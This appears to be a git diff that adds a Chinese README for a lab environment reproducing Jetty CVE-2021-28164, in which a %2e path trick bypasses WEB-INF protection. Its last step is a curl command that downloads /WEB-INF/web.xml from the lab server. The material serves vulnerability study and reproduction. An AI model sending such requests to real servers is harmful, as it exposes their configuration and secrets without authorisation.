first commit

jetty/CVE-2021-28164/README.zh-cn.md

@@ -0,0 +1,34 @@
+# Jetty WEB-INF 敏感信息泄露漏洞（CVE-2021-28164）
+
+Eclipse Jetty是一个开源的servlet容器，它为基于Java的Web容器提供运行环境。
+
+Jetty 9.4.37引入对RFC3986的新实现，而URL编码的`.`字符被排除在URI规范之外，这个行为在RFC中是正确的，但在servlet的实现中导致攻击者可以通过`%2e`来绕过限制，下载WEB-INF目录下的任意文件，导致敏感信息泄露。该漏洞在9.4.39中修复。
+
+参考链接：
+
+- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
+- https://xz.aliyun.com/t/10039
+
+## 漏洞环境
+
+执行如下命令启动一个Jetty 9.4.37：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`可以查看到一个example页面。
+
+## 漏洞复现
+
+直接访问`/WEB-INF/web.xml`将会返回404页面：
+
+![](1.png)
+
+使用`%2e/`来绕过限制下载web.xml：
+
+```
+curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml'
+```
+
+![](2.png)